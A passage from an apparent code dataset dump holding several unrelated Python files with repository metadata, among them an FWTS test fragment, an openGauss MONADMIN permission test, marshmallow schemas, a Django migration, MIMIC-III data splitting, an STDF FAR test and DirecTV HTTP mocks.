        self.cv_HOST = conf.host()
        self.cv_SYSTEM = conf.system()
        self.bmc_type = conf.args.bmc_type
        self.real_fwts_suite = unittest.TestSuite()
        try:
            self.cv_SYSTEM.goto_state(OpSystemState.OS)
        except Exception as e:
            # In the event of something going wrong during IPL,
            # we need to catch that here as we're abusing UnitTest
            # TestSuite infra and we don't have the catch-all that
            # a TestCase provides.
            f = FWTSCommandFailed()
            f.FAIL = e
            self.real_fwts_suite.addTest(f)
            self.real_fwts_suite.run(result)
            return
        self.centaurs_present = self.cv_SYSTEM.has_centaurs_in_dt()
        host = self.cv_HOST
        fwts_version = None
        try:
            fwts_version = host.host_run_command('fwts --version')
        except CommandFailed as cf:
            command_failed = FWTSCommandFailed()
            command_failed.FAIL = cf
            self.real_fwts_suite.addTest(command_failed)
        if fwts_version:
            # We want to ensure we're at least at version 17.01,
            # which means we need to parse e.g.:
            # fwts, Version V17.01.00, 2017-01-19 04:20:38
            v = re.search(r"fwts, Version V(\d+)\.(\d+)", ''.join(fwts_version))
            if v is None:
                # Robustness fix: an unparseable version string used to crash
                # with AttributeError on v.group(); report it as a failure.
                unparsed = FWTSCommandFailed()
                unparsed.FAIL = Exception(
                    "Could not parse fwts version from: %s" % ''.join(fwts_version))
                self.real_fwts_suite.addTest(unparsed)
            else:
                # Bug fix: convert to int here. The original assigned the raw
                # regex groups (strings) to FWTSVersion, whose version_check()
                # compares against ints (str > int raises TypeError on py3).
                major, minor = int(v.group(1)), int(v.group(2))
                checkver = FWTSVersion()
                checkver.MAJOR = major
                checkver.MINOR = minor
                self.real_fwts_suite.addTest(checkver)
                if checkver.version_check():
                    self.add_fwts_results(major, minor)
        self.real_fwts_suite.run(result)
| false | true |
79012013f89f59e7c39e1a1aace848e091a2dc28 | 2,838 | py | Python | openGaussBase/testcase/SECURITY/PERMISSIONS/Opengauss_Function_Security_User_Case0010.py | opengauss-mirror/Yat | aef107a8304b94e5d99b4f1f36eb46755eb8919e | [
"MulanPSL-1.0"
] | null | null | null | openGaussBase/testcase/SECURITY/PERMISSIONS/Opengauss_Function_Security_User_Case0010.py | opengauss-mirror/Yat | aef107a8304b94e5d99b4f1f36eb46755eb8919e | [
"MulanPSL-1.0"
] | null | null | null | openGaussBase/testcase/SECURITY/PERMISSIONS/Opengauss_Function_Security_User_Case0010.py | opengauss-mirror/Yat | aef107a8304b94e5d99b4f1f36eb46755eb8919e | [
"MulanPSL-1.0"
] | null | null | null | """
Copyright (c) 2022 Huawei Technologies Co.,Ltd.
openGauss is licensed under Mulan PSL v2.
You can use this software according to the terms and conditions of the Mulan PSL v2.
You may obtain a copy of Mulan PSL v2 at:
http://license.coscl.org.cn/MulanPSL2
THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND,
EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT,
MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
See the Mulan PSL v2 for more details.
"""
"""
Case Type : security-user
Case Name : 监控管理员用户可以进行DDL操作
Description :
1.创建监控管理员用户
CREEATE USER monadmin WITH MONADMIN PASSWORD '******'
2.监控管理员用户登录,执行DDL语句
CREATE TABLE table001(id INT);
INSERT INTO table001 VALUES(3);
DROP TABLE table001;
Expect :
1.CREATE ROLE
2.CREATE TABLE
INSERT 0 1
DROP TABLE
History :
"""
import unittest
from yat.test import Node
from yat.test import macro
from testcase.utils.CommonSH import CommonSH
from testcase.utils.Logger import Logger
from testcase.utils.Common import Common
class Privategrant(unittest.TestCase):
    """Security case 0010: a MONADMIN (monitor admin) user may run DDL."""

    def setUp(self):
        """Prepare the logger, primary-node handles, and helpers."""
        self.logger = Logger()
        self.logger.info(
            '------Opengauss_Function_Security_User_Case0010 start-----')
        self.userNode = Node('PrimaryDbUser')
        self.DB_ENV_PATH = macro.DB_ENV_PATH
        self.sh_primy = CommonSH('PrimaryDbUser')
        self.common = Common()

    def test_default_permission(self):
        """Create a MONADMIN user, then run CREATE/INSERT/DROP as that user."""
        self.logger.info('---------创建MONADMIN用户-------------')
        create_user_sql = (
            f"CREATE USER monadmin WITH MONADMIN PASSWORD "
            f"'{macro.COMMON_PASSWD}';"
        )
        create_result = self.sh_primy.execut_db_sql(create_user_sql)
        self.assertIn('CREATE ROLE', create_result)
        self.logger.info('---------MONADMIN用户执行DDL语句------------')
        ddl_sql = (
            'CREATE TABLE table001(id INT);'
            'INSERT INTO table001 VALUES(3);'
            'DROP TABLE table001;'
        )
        gsql_cmd = (
            f'source {self.DB_ENV_PATH};'
            f'gsql -d {self.userNode.db_name} -p '
            f'{self.userNode.db_port} -U monadmin -W '
            f'{macro.COMMON_PASSWD} -c "{ddl_sql}"'
        )
        self.logger.info(gsql_cmd)
        ddl_result = self.userNode.sh(gsql_cmd).result()
        self.logger.info(ddl_result)
        self.common.equal_sql_mdg(ddl_result, 'CREATE TABLE', 'INSERT 0 1',
                                  'DROP TABLE')

    def tearDown(self):
        """Drop the MONADMIN user created by the test."""
        self.logger.info('---------清理环境-----------')
        drop_result = self.sh_primy.execut_db_sql('drop user monadmin;')
        self.logger.info(drop_result)
        self.assertIn('DROP ROLE', drop_result)
        self.logger.info(
            '----Opengauss_Function_Security_User_Case0010 finish----')
| 36.384615 | 84 | 0.627555 | import unittest
from yat.test import Node
from yat.test import macro
from testcase.utils.CommonSH import CommonSH
from testcase.utils.Logger import Logger
from testcase.utils.Common import Common
class Privategrant(unittest.TestCase):
    """Security case 0010: a MONADMIN (monitor admin) user can run DDL."""
    def setUp(self):
        """Create the logger, node handles, and helpers for the case."""
        self.logger = Logger()
        self.logger.info(
            '------Opengauss_Function_Security_User_Case0010 start-----')
        self.userNode = Node('PrimaryDbUser')
        self.DB_ENV_PATH = macro.DB_ENV_PATH
        self.sh_primy = CommonSH('PrimaryDbUser')
        self.common = Common()
    def test_default_permission(self):
        """Create a MONADMIN user and run CREATE/INSERT/DROP as that user."""
        # Step 1: create the monitor-admin user on the primary node.
        self.logger.info('---------创建MONADMIN用户-------------')
        sql_cmd1 = f'CREATE USER monadmin WITH MONADMIN PASSWORD ' \
                   f'\'{macro.COMMON_PASSWD}\';'
        msg1 = self.sh_primy.execut_db_sql(sql_cmd1)
        self.assertTrue(msg1.find('CREATE ROLE') > -1)
        # Step 2: log in as monadmin via gsql and run the DDL statements.
        self.logger.info('---------MONADMIN用户执行DDL语句------------')
        sql_cmd2 = 'CREATE TABLE table001(id INT);' \
                   'INSERT INTO table001 VALUES(3);' \
                   'DROP TABLE table001;'
        excute_cmd2 = f'source {self.DB_ENV_PATH};' \
                      f'gsql -d {self.userNode.db_name} -p ' \
                      f'{self.userNode.db_port} -U monadmin -W ' \
                      f'{macro.COMMON_PASSWD} -c "{sql_cmd2}"'
        self.logger.info(excute_cmd2)
        msg2 = self.userNode.sh(excute_cmd2).result()
        self.logger.info(msg2)
        # Expect CREATE TABLE / INSERT 0 1 / DROP TABLE in the gsql output.
        self.common.equal_sql_mdg(msg2, 'CREATE TABLE', 'INSERT 0 1',
                                  'DROP TABLE')
    def tearDown(self):
        """Drop the MONADMIN user created by this case."""
        self.logger.info('---------清理环境-----------')
        sql_cmd1 = f'drop user monadmin;'
        msg1 = self.sh_primy.execut_db_sql(sql_cmd1)
        self.logger.info(msg1)
        self.assertTrue(msg1.find('DROP ROLE') > -1)
        self.logger.info(
            '----Opengauss_Function_Security_User_Case0010 finish----')
| true | true |
79012027ec44685127fd95d1f66b85fa2b2fe231 | 1,053 | py | Python | ticketbyrd/schema.py | barrachri/ticketbyrd | 568d1a501d1c458d33ff9cacaae4c12e7decb4dd | [
"Apache-2.0"
] | null | null | null | ticketbyrd/schema.py | barrachri/ticketbyrd | 568d1a501d1c458d33ff9cacaae4c12e7decb4dd | [
"Apache-2.0"
] | 1 | 2017-12-01T11:02:29.000Z | 2017-12-01T11:02:29.000Z | ticketbyrd/schema.py | barrachri/ticketbyrd | 568d1a501d1c458d33ff9cacaae4c12e7decb4dd | [
"Apache-2.0"
] | null | null | null | from marshmallow import Schema, fields
from marshmallow.validate import OneOf
ticket_type = ("Bug", "Report", "Feature", "Request", "Other")
ticket_urgency = ("Low", "Mid", "High")
ticket_status = ("Open", "In Progress", "Completed", "Rejected")
class Ticket(Schema):
    """Serialization/validation schema for a support ticket."""
    id = fields.Int(dump_only=True)
    # Set by the server when the ticket is stored; read-only for clients.
    created_at = fields.DateTime(dump_only=True)
    name = fields.Str(required=True)
    email = fields.Email(required=True)
    subject = fields.Str(required=True)
    # Bug fix: `created_at` was declared a second time here, silently
    # overwriting the first declaration; the duplicate has been removed.
    message = fields.Str(required=True)
    type = fields.Str(required=True, validate=OneOf(ticket_type))
    urgency = fields.Str(required=True, validate=OneOf(ticket_urgency))
    # New tickets default to "Open" when the client omits the status.
    status = fields.Str(
        missing="Open", required=True, validate=OneOf(ticket_status)
    )
class Comment(Schema):
    """Serialization schema for a comment attached to a ticket."""
    id = fields.Int(dump_only=True)  # assigned by the server, read-only
    message = fields.Str(required=True)
    created_at = fields.DateTime(dump_only=True)  # set server-side
class User(Schema):
    """Schema for login credentials."""
    # NOTE(review): validated as a plain string, not fields.Email —
    # presumably intentional for login; confirm before tightening.
    email = fields.Str(required=True)
    password = fields.Str(required=True)
| 33.967742 | 71 | 0.705603 | from marshmallow import Schema, fields
from marshmallow.validate import OneOf
ticket_type = ("Bug", "Report", "Feature", "Request", "Other")
ticket_urgency = ("Low", "Mid", "High")
ticket_status = ("Open", "In Progress", "Completed", "Rejected")
class Ticket(Schema):
    """Serialization/validation schema for a support ticket."""
    id = fields.Int(dump_only=True)
    # Set by the server when the ticket is stored; read-only for clients.
    created_at = fields.DateTime(dump_only=True)
    name = fields.Str(required=True)
    email = fields.Email(required=True)
    subject = fields.Str(required=True)
    # Bug fix: `created_at` was declared a second time here, silently
    # overwriting the first declaration; the duplicate has been removed.
    message = fields.Str(required=True)
    type = fields.Str(required=True, validate=OneOf(ticket_type))
    urgency = fields.Str(required=True, validate=OneOf(ticket_urgency))
    # New tickets default to "Open" when the client omits the status.
    status = fields.Str(
        missing="Open", required=True, validate=OneOf(ticket_status)
    )
class Comment(Schema):
    """Serialization schema for a comment attached to a ticket."""
    id = fields.Int(dump_only=True)  # assigned by the server, read-only
    message = fields.Str(required=True)
    created_at = fields.DateTime(dump_only=True)  # set server-side
class User(Schema):
    """Schema for login credentials."""
    # NOTE(review): validated as a plain string, not fields.Email —
    # presumably intentional for login; confirm before tightening.
    email = fields.Str(required=True)
    password = fields.Str(required=True)
| true | true |
790120c2bf9860a37f6bc1148ad28ee57adb0362 | 942 | py | Python | plants_api/main_site/migrations/0015_auto_20191109_2046.py | Javen17/plants_api | 08e68aa6a1d350f00879b645bbfdc37b900e9464 | [
"MIT"
] | 2 | 2019-09-29T04:19:32.000Z | 2019-10-27T23:44:21.000Z | plants_api/main_site/migrations/0015_auto_20191109_2046.py | Javen17/plants_api | 08e68aa6a1d350f00879b645bbfdc37b900e9464 | [
"MIT"
] | 12 | 2020-03-28T00:13:21.000Z | 2022-02-10T08:33:33.000Z | plants_api/main_site/migrations/0015_auto_20191109_2046.py | Javen17/plants_api | 08e68aa6a1d350f00879b645bbfdc37b900e9464 | [
"MIT"
] | 1 | 2019-09-28T20:27:45.000Z | 2019-09-28T20:27:45.000Z | # Generated by Django 2.2.5 on 2019-11-10 02:46
from django.db import migrations
import django.db.models.deletion
import smart_selects.db_fields
class Migration(migrations.Migration):
    """Auto-generated: alter the `genus` field on both specimen models to a
    smart_selects ChainedForeignKey whose choices are chained to `family`."""
    dependencies = [
        ('main_site', '0014_auto_20191109_2038'),
    ]
    operations = [
        # Genus choices are filtered by the specimen's selected `family`;
        # deleting a Genus cascades to the specimens that reference it.
        migrations.AlterField(
            model_name='mushroomspecimen',
            name='genus',
            field=smart_selects.db_fields.ChainedForeignKey(chained_field='family', chained_model_field='family', default=0, on_delete=django.db.models.deletion.CASCADE, to='main_site.Genus', verbose_name='Género'),
        ),
        # Same change for plant specimens.
        migrations.AlterField(
            model_name='plantspecimen',
            name='genus',
            field=smart_selects.db_fields.ChainedForeignKey(chained_field='family', chained_model_field='family', default=0, on_delete=django.db.models.deletion.CASCADE, to='main_site.Genus', verbose_name='Género'),
        ),
    ]
| 36.230769 | 215 | 0.687898 |
from django.db import migrations
import django.db.models.deletion
import smart_selects.db_fields
class Migration(migrations.Migration):
    """Auto-generated: alter the `genus` field on both specimen models to a
    smart_selects ChainedForeignKey whose choices are chained to `family`."""
    dependencies = [
        ('main_site', '0014_auto_20191109_2038'),
    ]
    operations = [
        # Genus choices are filtered by the specimen's selected `family`;
        # deleting a Genus cascades to the specimens that reference it.
        migrations.AlterField(
            model_name='mushroomspecimen',
            name='genus',
            field=smart_selects.db_fields.ChainedForeignKey(chained_field='family', chained_model_field='family', default=0, on_delete=django.db.models.deletion.CASCADE, to='main_site.Genus', verbose_name='Género'),
        ),
        # Same change for plant specimens.
        migrations.AlterField(
            model_name='plantspecimen',
            name='genus',
            field=smart_selects.db_fields.ChainedForeignKey(chained_field='family', chained_model_field='family', default=0, on_delete=django.db.models.deletion.CASCADE, to='main_site.Genus', verbose_name='Género'),
        ),
    ]
| true | true |
79012104f95db52a63271c87390d80a9ef333446 | 4,453 | py | Python | dataproc/concat_and_split.py | franzbischoff/caml-mimic | 9ce53f4a5093e09f12ed408480af0804aba7d7ca | [
"MIT"
] | null | null | null | dataproc/concat_and_split.py | franzbischoff/caml-mimic | 9ce53f4a5093e09f12ed408480af0804aba7d7ca | [
"MIT"
] | null | null | null | dataproc/concat_and_split.py | franzbischoff/caml-mimic | 9ce53f4a5093e09f12ed408480af0804aba7d7ca | [
"MIT"
] | null | null | null | """
Concatenate the labels with the notes data and split using the saved splits
"""
import csv
from datetime import datetime
import random
from constants import DATA_DIR
from constants import MIMIC_3_DIR
import pandas as pd
DATETIME_FORMAT = "%Y-%m-%d %H-%M-%S"
def concat_data(labelsfile, notes_file):
    """Join each discharge note with its label set and write notes_labeled.csv.

    INPUTS:
        labelsfile: sorted by hadm id, contains one label per line
        notes_file: sorted by hadm id, contains one note per line

    Returns the path of the combined output file under MIMIC_3_DIR.
    """
    with open(labelsfile, 'r') as lf:
        print("CONCATENATING")
        with open(notes_file, 'r') as notesfile:
            outfilename = '%s/notes_labeled.csv' % MIMIC_3_DIR
            with open(outfilename, 'w') as outfile:
                w = csv.writer(outfile)
                w.writerow(['SUBJECT_ID', 'HADM_ID', 'TEXT', 'LABELS'])
                # Walk both sorted streams in lockstep, one admission at a time.
                labels_gen = next_labels(lf)
                notes_gen = next_notes(notesfile)
                for i, (subj_id, text, hadm_id) in enumerate(notes_gen):
                    if i % 10000 == 0:
                        print(str(i) + " done")
                    # NOTE(review): assumes the label file has an entry for
                    # every note; a missing one raises StopIteration here.
                    cur_subj, cur_labels, cur_hadm = next(labels_gen)
                    if cur_hadm == hadm_id:
                        w.writerow([subj_id, str(hadm_id), text, ';'.join(cur_labels)])
                    else:
                        print("couldn't find matching hadm_id. data is probably not sorted correctly")
                        break
    return outfilename
def split_data(labeledfile, base_name):
    """Split the labeled notes file into train/dev/test CSVs.

    Row membership is decided by the saved hadm_id split files
    ({train,dev,test}_full_hadm_ids.csv) under MIMIC_3_DIR.

    :param labeledfile: path to the combined notes+labels CSV
    :param base_name: prefix for the three output files
    :return: the (train, dev, test) output file names
    """
    print("SPLITTING2")
    train_name = '%s_train_split.csv' % (base_name)
    dev_name = '%s_dev_split.csv' % (base_name)
    test_name = '%s_test_split.csv' % (base_name)

    # Read in the saved train/dev/test hadm_id splits.
    hadm_ids = {}
    for splt in ['train', 'dev', 'test']:
        hadm_ids[splt] = set()
        with open('%s/%s_full_hadm_ids.csv' % (MIMIC_3_DIR, splt), 'r') as f:
            for line in f:
                hadm_ids[splt].add(line.rstrip())

    # Bug fix: rows used to be written with ','.join(row), which corrupts the
    # CSV whenever a field (e.g. the note text) contains a comma or a quote.
    # csv.writer quotes fields correctly; newline='' is the csv-module
    # convention; `with` guarantees the files are closed even on error.
    with open(train_name, 'w', newline='') as train_file, \
            open(dev_name, 'w', newline='') as dev_file, \
            open(test_name, 'w', newline='') as test_file:
        writers = {
            'train': csv.writer(train_file),
            'dev': csv.writer(dev_file),
            'test': csv.writer(test_file),
        }
        for w in writers.values():
            w.writerow(['SUBJECT_ID', 'HADM_ID', 'TEXT', 'LABELS'])

        with open(labeledfile, 'r') as lf:
            reader = csv.reader(lf)
            next(reader)  # skip the header
            for i, row in enumerate(reader):
                if i % 10000 == 0:
                    print(str(i) + " read")
                if len(row) > 0:  # skip blank rows (windows fix)
                    hadm_id = row[1]
                    # Each hadm_id belongs to exactly one split.
                    for splt in ('train', 'dev', 'test'):
                        if hadm_id in hadm_ids[splt]:
                            writers[splt].writerow(row)
                            break
    return train_name, dev_name, test_name
def next_labels(labelsfile):
    """Yield one (subject_id, [codes], hadm_id) tuple per admission.

    Expects the label file to be sorted by hadm id so that all codes for
    an admission are contiguous.
    """
    reader = csv.reader(labelsfile)
    next(reader)  # skip the header row
    first = next(reader)
    subj, hadm, codes = int(first[0]), int(first[1]), [first[2]]
    for row in reader:
        row_subj, row_hadm, code = int(row[0]), int(row[1]), row[2]
        if (row_subj, row_hadm) != (subj, hadm):
            # New admission: flush the collected codes and start over.
            yield subj, codes, hadm
            subj, hadm, codes = row_subj, row_hadm, [code]
        else:
            codes.append(code)
    # Flush the final admission.
    yield subj, codes, hadm
def next_notes(notesfile):
    """Yield one (subject_id, text, hadm_id) tuple per admission.

    Discharge summaries and their addenda share a subject and hadm id and
    are concatenated (space-separated) into a single text blob.
    """
    reader = csv.reader(notesfile)
    next(reader)  # skip the header row
    first = next(reader)
    subj, hadm = int(first[0]), int(first[1])
    parts = [first[3]]
    for row in reader:
        row_subj, row_hadm, text = int(row[0]), int(row[1]), row[3]
        if (row_subj, row_hadm) != (subj, hadm):
            # New admission: emit the assembled note and start over.
            yield subj, " ".join(parts), hadm
            subj, hadm, parts = row_subj, row_hadm, [text]
        else:
            # Addendum for the same stay; append to the running text.
            parts.append(text)
    # Emit the final admission's note.
    yield subj, " ".join(parts), hadm
| 28.544872 | 113 | 0.628116 | import csv
from datetime import datetime
import random
from constants import DATA_DIR
from constants import MIMIC_3_DIR
import pandas as pd
DATETIME_FORMAT = "%Y-%m-%d %H-%M-%S"
def concat_data(labelsfile, notes_file):
    """Join each discharge note with its label set and write notes_labeled.csv.

    Both inputs must be sorted by hadm id, one label / one note per line.
    Returns the path of the combined output file under MIMIC_3_DIR.
    """
    with open(labelsfile, 'r') as lf:
        print("CONCATENATING")
        with open(notes_file, 'r') as notesfile:
            outfilename = '%s/notes_labeled.csv' % MIMIC_3_DIR
            with open(outfilename, 'w') as outfile:
                w = csv.writer(outfile)
                w.writerow(['SUBJECT_ID', 'HADM_ID', 'TEXT', 'LABELS'])
                # Walk both sorted streams in lockstep, one admission at a time.
                labels_gen = next_labels(lf)
                notes_gen = next_notes(notesfile)
                for i, (subj_id, text, hadm_id) in enumerate(notes_gen):
                    if i % 10000 == 0:
                        print(str(i) + " done")
                    # NOTE(review): assumes the label file has an entry for
                    # every note; a missing one raises StopIteration here.
                    cur_subj, cur_labels, cur_hadm = next(labels_gen)
                    if cur_hadm == hadm_id:
                        w.writerow([subj_id, str(hadm_id), text, ';'.join(cur_labels)])
                    else:
                        print("couldn't find matching hadm_id. data is probably not sorted correctly")
                        break
    return outfilename
def split_data(labeledfile, base_name):
    """Split the labeled notes file into train/dev/test CSVs.

    Row membership is decided by the saved hadm_id split files
    ({train,dev,test}_full_hadm_ids.csv) under MIMIC_3_DIR.

    :param labeledfile: path to the combined notes+labels CSV
    :param base_name: prefix for the three output files
    :return: the (train, dev, test) output file names
    """
    print("SPLITTING2")
    train_name = '%s_train_split.csv' % (base_name)
    dev_name = '%s_dev_split.csv' % (base_name)
    test_name = '%s_test_split.csv' % (base_name)

    # Read in the saved train/dev/test hadm_id splits.
    hadm_ids = {}
    for splt in ['train', 'dev', 'test']:
        hadm_ids[splt] = set()
        with open('%s/%s_full_hadm_ids.csv' % (MIMIC_3_DIR, splt), 'r') as f:
            for line in f:
                hadm_ids[splt].add(line.rstrip())

    # Bug fix: rows used to be written with ','.join(row), which corrupts the
    # CSV whenever a field (e.g. the note text) contains a comma or a quote.
    # csv.writer quotes fields correctly; newline='' is the csv-module
    # convention; `with` guarantees the files are closed even on error.
    with open(train_name, 'w', newline='') as train_file, \
            open(dev_name, 'w', newline='') as dev_file, \
            open(test_name, 'w', newline='') as test_file:
        writers = {
            'train': csv.writer(train_file),
            'dev': csv.writer(dev_file),
            'test': csv.writer(test_file),
        }
        for w in writers.values():
            w.writerow(['SUBJECT_ID', 'HADM_ID', 'TEXT', 'LABELS'])

        with open(labeledfile, 'r') as lf:
            reader = csv.reader(lf)
            next(reader)  # skip the header
            for i, row in enumerate(reader):
                if i % 10000 == 0:
                    print(str(i) + " read")
                if len(row) > 0:  # skip blank rows (windows fix)
                    hadm_id = row[1]
                    # Each hadm_id belongs to exactly one split.
                    for splt in ('train', 'dev', 'test'):
                        if hadm_id in hadm_ids[splt]:
                            writers[splt].writerow(row)
                            break
    return train_name, dev_name, test_name
def next_labels(labelsfile):
    """Yield one (subject_id, [codes], hadm_id) tuple per admission.

    Expects the label file to be sorted by hadm id so that all codes for
    an admission are contiguous.
    """
    reader = csv.reader(labelsfile)
    next(reader)  # skip the header row
    first = next(reader)
    subj, hadm, codes = int(first[0]), int(first[1]), [first[2]]
    for row in reader:
        row_subj, row_hadm, code = int(row[0]), int(row[1]), row[2]
        if (row_subj, row_hadm) != (subj, hadm):
            # New admission: flush the collected codes and start over.
            yield subj, codes, hadm
            subj, hadm, codes = row_subj, row_hadm, [code]
        else:
            codes.append(code)
    # Flush the final admission.
    yield subj, codes, hadm
def next_notes(notesfile):
    """Yield one (subject_id, text, hadm_id) tuple per admission.

    Discharge summaries and their addenda share a subject and hadm id and
    are concatenated (space-separated) into a single text blob.
    """
    reader = csv.reader(notesfile)
    next(reader)  # skip the header row
    first = next(reader)
    subj, hadm = int(first[0]), int(first[1])
    parts = [first[3]]
    for row in reader:
        row_subj, row_hadm, text = int(row[0]), int(row[1]), row[3]
        if (row_subj, row_hadm) != (subj, hadm):
            # New admission: emit the assembled note and start over.
            yield subj, " ".join(parts), hadm
            subj, hadm, parts = row_subj, row_hadm, [text]
        else:
            # Addendum for the same stay; append to the running text.
            parts.append(text)
    # Emit the final admission's note.
    yield subj, " ".join(parts), hadm
| true | true |
7901219870ed42d9c90e5151521dfeebde965c41 | 1,563 | py | Python | tests/STDF/test_FAR.py | awinia-github/Semi-ATE-STDF | f9f4e6544928f56a9be150bdbc38971ac32dd9fc | [
"MIT"
] | null | null | null | tests/STDF/test_FAR.py | awinia-github/Semi-ATE-STDF | f9f4e6544928f56a9be150bdbc38971ac32dd9fc | [
"MIT"
] | null | null | null | tests/STDF/test_FAR.py | awinia-github/Semi-ATE-STDF | f9f4e6544928f56a9be150bdbc38971ac32dd9fc | [
"MIT"
] | null | null | null | import os
import tempfile
from tests.STDF.STDFRecordTest import STDFRecordTest
from STDF import FAR
# File Attributes Record
# Function:
#   Contains the information necessary to determine
#   how to decode the STDF data contained in the file.
def test_FAR():
    """Exercise the FAR record round-trip for both endiannesses."""
    for endianness in ('<', '>'):
        far(endianness)
def far(end):
    """Round-trip a FAR (File Attributes Record) and verify its fields.

    STDF v4 spec, page 57.

    :param end: struct endianness marker, '<' (little) or '>' (big)
    """
    record = FAR(endian=end)

    tf = tempfile.NamedTemporaryFile(delete=False)
    # We only need the file name; close the handle right away (reopening a
    # file that is still open fails on Windows).
    tf.close()
    try:
        # Test serialization:
        # 1. Save the FAR record into a file.
        # 2. Read it back byte by byte and compare with expected values.
        w_data = record.__repr__()
        # Bug fix: the original had `f.close` (missing parentheses), so the
        # file was never closed/flushed before being reopened for reading.
        with open(tf.name, "wb") as f:
            f.write(w_data)

        with open(tf.name, "rb") as f:
            stdfRecTest = STDFRecordTest(f, end)
            # rec_len, rec_type, rec_sub
            stdfRecTest.assert_file_record_header(2, 0, 10)
            # REC_CPU, expected value 2
            stdfRecTest.assert_ubyte(2)
            # STDF_VER, expected value 4
            stdfRecTest.assert_ubyte(4)

        # Test de-serialization:
        # 1. Re-create the record from the raw bytes.
        # 2. Read record fields and compare with the expected values.
        inst = FAR('V4', end, w_data)
        # rec_len, rec_type, rec_sub
        stdfRecTest.assert_instance_record_header(inst, 2, 0, 10)
        # REC_CPU field, position 3, value 2
        stdfRecTest.assert_instance_field(inst, 3, 2)
        # STDF_VER field, position 4, value 4
        stdfRecTest.assert_instance_field(inst, 4, 4)

        # Test ATDF output
        expected_atdf = "FAR:A|4|2|U"
        assert inst.to_atdf() == expected_atdf
        # ToDo: Test JSON output
    finally:
        os.remove(tf.name)
| 25.209677 | 62 | 0.672425 | import os
import tempfile
from tests.STDF.STDFRecordTest import STDFRecordTest
from STDF import FAR
def test_FAR():
    """Exercise the FAR record round-trip for both endiannesses."""
    for endianness in ('<', '>'):
        far(endianness)
def far(end):
    """Round-trip a FAR (File Attributes Record) and verify its fields.

    STDF v4 spec, page 57.

    :param end: struct endianness marker, '<' (little) or '>' (big)
    """
    record = FAR(endian=end)

    tf = tempfile.NamedTemporaryFile(delete=False)
    # We only need the file name; close the handle right away (reopening a
    # file that is still open fails on Windows).
    tf.close()
    try:
        # Serialization: write the record, then read it back field by field.
        w_data = record.__repr__()
        # Bug fix: the original had `f.close` (missing parentheses), so the
        # file was never closed/flushed before being reopened for reading.
        with open(tf.name, "wb") as f:
            f.write(w_data)

        with open(tf.name, "rb") as f:
            stdfRecTest = STDFRecordTest(f, end)
            # rec_len, rec_type, rec_sub
            stdfRecTest.assert_file_record_header(2, 0, 10)
            # REC_CPU, expected value 2
            stdfRecTest.assert_ubyte(2)
            # STDF_VER, expected value 4
            stdfRecTest.assert_ubyte(4)

        # De-serialization: re-create the record from the raw bytes.
        inst = FAR('V4', end, w_data)
        # rec_len, rec_type, rec_sub
        stdfRecTest.assert_instance_record_header(inst, 2, 0, 10)
        # REC_CPU field, position 3, value 2
        stdfRecTest.assert_instance_field(inst, 3, 2)
        # STDF_VER field, position 4, value 4
        stdfRecTest.assert_instance_field(inst, 4, 4)

        # ATDF output
        expected_atdf = "FAR:A|4|2|U"
        assert inst.to_atdf() == expected_atdf
    finally:
        os.remove(tf.name)
| true | true |
790121ddca1355464b2166c981c47760f734c1d7 | 3,982 | py | Python | tests/components/directv/__init__.py | DoctorU/core | 5b218d7e1c4164e32d41473977459cbaf23adf42 | [
"Apache-2.0"
] | 7 | 2019-08-15T13:36:58.000Z | 2020-03-18T10:46:29.000Z | tests/components/directv/__init__.py | DoctorU/core | 5b218d7e1c4164e32d41473977459cbaf23adf42 | [
"Apache-2.0"
] | 87 | 2020-07-15T13:43:35.000Z | 2022-03-23T07:43:10.000Z | tests/components/directv/__init__.py | DoctorU/core | 5b218d7e1c4164e32d41473977459cbaf23adf42 | [
"Apache-2.0"
] | 7 | 2018-10-04T10:12:45.000Z | 2021-12-29T20:55:40.000Z | """Tests for the DirecTV component."""
from http import HTTPStatus
from homeassistant.components.directv.const import CONF_RECEIVER_ID, DOMAIN
from homeassistant.components.ssdp import ATTR_SSDP_LOCATION
from homeassistant.const import CONF_HOST, CONTENT_TYPE_JSON
from homeassistant.core import HomeAssistant
from tests.common import MockConfigEntry, load_fixture
from tests.test_util.aiohttp import AiohttpClientMocker
# Address and identity of the mocked DirecTV receiver.
HOST = "127.0.0.1"
RECEIVER_ID = "028877455858"
SSDP_LOCATION = "http://127.0.0.1/"
UPNP_SERIAL = "RID-028877455858"
# Canned inputs for config-flow tests.
MOCK_CONFIG = {DOMAIN: [{CONF_HOST: HOST}]}
MOCK_SSDP_DISCOVERY_INFO = {ATTR_SSDP_LOCATION: SSDP_LOCATION}
MOCK_USER_INPUT = {CONF_HOST: HOST}
def mock_connection(aioclient_mock: AiohttpClientMocker) -> None:
    """Mock the DirecTV receiver's HTTP API for Home Assistant tests.

    Registers canned JSON fixture responses for every endpoint the
    integration calls. Param-specific responses are registered before the
    generic one for the same URL — presumably matched in registration
    order by AiohttpClientMocker (TODO confirm).
    """
    # Receiver software version.
    aioclient_mock.get(
        f"http://{HOST}:8080/info/getVersion",
        text=load_fixture("directv/info-get-version.json"),
        headers={"Content-Type": CONTENT_TYPE_JSON},
    )
    # Known client devices / locations.
    aioclient_mock.get(
        f"http://{HOST}:8080/info/getLocations",
        text=load_fixture("directv/info-get-locations.json"),
        headers={"Content-Type": CONTENT_TYPE_JSON},
    )
    # Client B01234567890 reports standby mode.
    aioclient_mock.get(
        f"http://{HOST}:8080/info/mode",
        params={"clientAddr": "B01234567890"},
        text=load_fixture("directv/info-mode-standby.json"),
        headers={"Content-Type": CONTENT_TYPE_JSON},
    )
    # Client 9XXXXXXXXXX9 simulates a server error on the mode query.
    aioclient_mock.get(
        f"http://{HOST}:8080/info/mode",
        params={"clientAddr": "9XXXXXXXXXX9"},
        status=HTTPStatus.INTERNAL_SERVER_ERROR,
        text=load_fixture("directv/info-mode-error.json"),
        headers={"Content-Type": CONTENT_TYPE_JSON},
    )
    # Default mode response for any other client.
    aioclient_mock.get(
        f"http://{HOST}:8080/info/mode",
        text=load_fixture("directv/info-mode.json"),
        headers={"Content-Type": CONTENT_TYPE_JSON},
    )
    # Remote-control key presses.
    aioclient_mock.get(
        f"http://{HOST}:8080/remote/processKey",
        text=load_fixture("directv/remote-process-key.json"),
        headers={"Content-Type": CONTENT_TYPE_JSON},
    )
    # Channel tuning.
    aioclient_mock.get(
        f"http://{HOST}:8080/tv/tune",
        text=load_fixture("directv/tv-tune.json"),
